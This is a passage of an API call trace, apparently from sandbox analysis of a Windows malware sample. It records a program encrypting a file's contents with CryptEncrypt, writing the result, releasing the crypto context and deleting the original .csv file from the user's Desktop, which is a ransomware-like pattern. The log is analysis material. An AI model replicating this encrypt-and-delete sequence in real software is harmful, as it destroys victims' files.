PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.886] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.886] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.886] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.886] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.886] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.887] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xcf42, dwBufLen=0xcf48 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xcf48) returned 1 [0111.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.890] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0111.890] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.890] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0111.890] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.890] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.890] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0111.890] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.890] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0111.890] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.890] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.890] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.890] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.890] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0111.891] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0111.891] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0111.891] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0111.891] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0111.891] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.891] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.895] WriteFile (in: hFile=0x4b0, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0xcf48, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0xcf48, lpOverlapped=0x0) returned 1 [0111.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.897] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0111.897] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0111.897] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0111.897] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0111.897] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0111.897] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.897] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0111.897] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.898] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0111.898] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0111.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0111.898] CryptDestroyKey (hKey=0x9a4880) returned 1 [0111.899] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0111.899] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0111.899] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0111.899] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0111.899] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0111.899] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0111.899] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0111.899] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0111.899] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0111.899] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0111.899] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0111.948] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0111.948] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0111.948] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0111.948] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.948] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0111.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.948] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0111.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.948] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0111.948] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.948] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0111.948] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.949] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.949] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0111.949] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.949] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0111.949] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0111.949] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0111.949] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0111.949] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0111.949] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.949] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0111.949] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0111.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0111.949] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0111.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0111.949] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0111.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0111.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0111.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0111.949] CryptReleaseContext (hProv=0x9bf330, dwFlags=0x0) returned 1 [0111.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.950] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.950] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0111.950] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.950] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0111.950] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0111.950] FreeLibrary (hLibModule=0x76390000) returned 1 [0111.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.950] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.950] CloseHandle (hObject=0x4ec) returned 1 [0111.952] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.952] CloseHandle (hObject=0x4b0) returned 1 [0111.954] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.956] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.956] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0111.956] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0111.956] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ZvWDNly8ss.csv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ZvWDNly8ss.csv", lpFilePart=0x8cedf4*="ZvWDNly8ss.csv") returned 0x26 [0111.956] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZvWDNly8ss.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\zvwdnly8ss.csv")) returned 0x20 [0111.956] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZvWDNly8ss.csv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0x9a47c0 [0111.956] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZvWDNly8ss.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\zvwdnly8ss.csv")) returned 1 [0111.995] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0111.996] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0111.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75d80 | out: hHeap=0x2af0000) returned 1 [0111.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0111.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0111.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0111.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0111.996] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0111.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0111.996] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0111.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0111.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0111.996] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6568 [0111.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0111.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 